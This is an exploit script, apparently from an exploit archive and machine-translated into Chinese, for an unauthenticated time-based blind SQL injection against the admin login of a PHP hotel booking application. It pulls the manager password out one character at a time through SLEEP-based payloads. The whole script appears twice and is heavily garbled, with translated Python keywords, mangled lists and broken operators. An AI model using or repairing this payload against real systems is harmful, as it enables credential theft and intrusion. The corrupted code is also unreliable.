#利用标题:在线酒店预订php 1.0-盲sql注射(未经身份验证)
#Google Dork: N/A
#日期: 04/02/2024
#利用作者: Gian Paris C. Agsam
#供应商homepage3360 https://github.com/projectworldsofficial
#软件link: https://projectworlds.in/wp-content/uploads/2019/06/hotel-booking.zip
#版本: 1.0
#测试在: Apache/2.4.58(Debian)/php 8.2.12
#CVE : N/A
导入请求
导入argparse
从Colorama Import(fore as F,Back as B Back as B,样式为S)
BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB,SB,FW=B.Red,F.Reset,F.Red,F.Red,F.Green,F.yellow,F.Blue,F.Magenta,F.Magenta,F.Cycyan,f.cyan,S.Reset_Reset_AlseT_Reset_All,S.Dim,S.Dim,S.Dim,S.Bright,F.White
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.insecurreequestwarning)
proxies={'http':'http://127.0.0.0.1:808080','https':'http://127.0.0.13:808080808080808080808080'}
Parser=argparse.argumentParser(Description='漏洞盲sql注入')
parser.add_argument(' - u',' - url',help='')
args=parser.parse_args()
def Banner():
打印(f'''{fr}
马云惹不起马云▄▄▄马云惹不起马云▄▄▄。 ▄▄马云惹不起马云马云惹不起马云▄▄▄▄▄▄▄▄▪马云惹不起马云▄▄▄▄
▪▐▄▄马云惹不起马云▐▄▄马云惹不起马云▐█▐█。 ▀▄。
▄█▀▄██■■■▄██▄██马云惹不起马云▐█▌▐▀▀▄▐█▌▐▀▀▄马云惹不起马云▐█
▐█▌。 ██•█▌▐█▌▐▌▐█▌██。 ██
▀█▄▀▪▀▀▀▀▀▀•▀▀▀•。
github: https://github.com/offvision-droid
{FW}
''))
#定义要测试的字符
chars=[
'a','b','c','d','e','f','g','h','i','','j',k','k','l','m','m','n','n','n','o',o',o',o',o',
'p','q','r','s','t','u','v','w','x','y','',z','a','a','b','b','c','c',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d','
'e','f','g','h','i','j','k','l','m','n','n','o',p','q','q','q','r',s',s',s',s',s',
't','u','v','w','x','y','z','0','1','1','2','3','4','4','5','5','6','6','7',7',
'8','9','@','#'
这是给出的
def sqlipayload(char,position,userId,列,表):
sqli='admin \'联合选择if(substring(')
sqli +=str(列) +','
sqli +=str(位置) +',1)=\''
sqli +=str(char) +'\',sleep(3),null)
sqli +=str(table) +'其中uname='admin'\''
返回sqli
def poStrequrest(url,sqlireq,char,位置):
sqliurl=url
params={'emailusername':'admin','password': sqlireq,'submit':'login'}
req=requests.post(url=sqliurl,data=params,verify=false,prexies=perxies,timeout=10)
如果req.elapsed.total_seconds()=2:
print('{} : {}'。格式(char,req.elapsed.total_seconds()))
返回char
返回''
Def Theharvester(Target,Chars,url):
#print('retieving: {} {} {} {}'。格式(target ['table'],target ['column'],target ['id'']))
打印('检索管理员password'.format(target ['table'],target ['列'],target ['id'])))))
位置=1
full_pass=''
而位置5:
char中的char :
sqlireq=sqlipayload(char,position,target ['id'],target ['列'],target ['table'])
und_char=postrequest(url,sqlireq,char,位置)
full_pass +=找到_char
位置+=1
返回full_pass
如果name=='__ -Main __':
横幅()
主机=str(args.url)
路径=主机+'/酒店预订/admin/login.php'
AdminPassword={'ID':'1','table':'Manager','column':'upass'}
AdminPass=Theharvester(AdminPassword,chars,Path)
打印(“管理员密码:”,AdminPass)
#Google Dork: N/A
#日期: 04/02/2024
#利用作者: Gian Paris C. Agsam
#供应商homepage3360 https://github.com/projectworldsofficial
#软件link: https://projectworlds.in/wp-content/uploads/2019/06/hotel-booking.zip
#版本: 1.0
#测试在: Apache/2.4.58(Debian)/php 8.2.12
#CVE : N/A
导入请求
导入argparse
从Colorama Import(fore as F,Back as B Back as B,样式为S)
BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB,SB,FW=B.Red,F.Reset,F.Red,F.Red,F.Green,F.yellow,F.Blue,F.Magenta,F.Magenta,F.Cycyan,f.cyan,S.Reset_Reset_AlseT_Reset_All,S.Dim,S.Dim,S.Dim,S.Bright,F.White
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.insecurreequestwarning)
proxies={'http':'http://127.0.0.0.1:808080','https':'http://127.0.0.13:808080808080808080808080'}
Parser=argparse.argumentParser(Description='漏洞盲sql注入')
parser.add_argument(' - u',' - url',help='')
args=parser.parse_args()
def Banner():
打印(f'''{fr}
马云惹不起马云▄▄▄马云惹不起马云▄▄▄。 ▄▄马云惹不起马云马云惹不起马云▄▄▄▄▄▄▄▄▪马云惹不起马云▄▄▄▄
▪▐▄▄马云惹不起马云▐▄▄马云惹不起马云▐█▐█。 ▀▄。
▄█▀▄██■■■▄██▄██马云惹不起马云▐█▌▐▀▀▄▐█▌▐▀▀▄马云惹不起马云▐█
▐█▌。 ██•█▌▐█▌▐▌▐█▌██。 ██
▀█▄▀▪▀▀▀▀▀▀•▀▀▀•。
github: https://github.com/offvision-droid
{FW}
''))
#定义要测试的字符
chars=[
'a','b','c','d','e','f','g','h','i','','j',k','k','l','m','m','n','n','n','o',o',o',o',o',
'p','q','r','s','t','u','v','w','x','y','',z','a','a','b','b','c','c',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d','
'e','f','g','h','i','j','k','l','m','n','n','o',p','q','q','q','r',s',s',s',s',s',
't','u','v','w','x','y','z','0','1','1','2','3','4','4','5','5','6','6','7',7',
'8','9','@','#'
这是给出的
def sqlipayload(char,position,userId,列,表):
sqli='admin \'联合选择if(substring(')
sqli +=str(列) +','
sqli +=str(位置) +',1)=\''
sqli +=str(char) +'\',sleep(3),null)
sqli +=str(table) +'其中uname='admin'\''
返回sqli
def poStrequrest(url,sqlireq,char,位置):
sqliurl=url
params={'emailusername':'admin','password': sqlireq,'submit':'login'}
req=requests.post(url=sqliurl,data=params,verify=false,prexies=perxies,timeout=10)
如果req.elapsed.total_seconds()=2:
print('{} : {}'。格式(char,req.elapsed.total_seconds()))
返回char
返回''
Def Theharvester(Target,Chars,url):
#print('retieving: {} {} {} {}'。格式(target ['table'],target ['column'],target ['id'']))
打印('检索管理员password'.format(target ['table'],target ['列'],target ['id'])))))
位置=1
full_pass=''
而位置5:
char中的char :
sqlireq=sqlipayload(char,position,target ['id'],target ['列'],target ['table'])
und_char=postrequest(url,sqlireq,char,位置)
full_pass +=找到_char
位置+=1
返回full_pass
如果name=='__ -Main __':
横幅()
主机=str(args.url)
路径=主机+'/酒店预订/admin/login.php'
AdminPassword={'ID':'1','table':'Manager','column':'upass'}
AdminPass=Theharvester(AdminPassword,chars,Path)
打印(“管理员密码:”,AdminPass)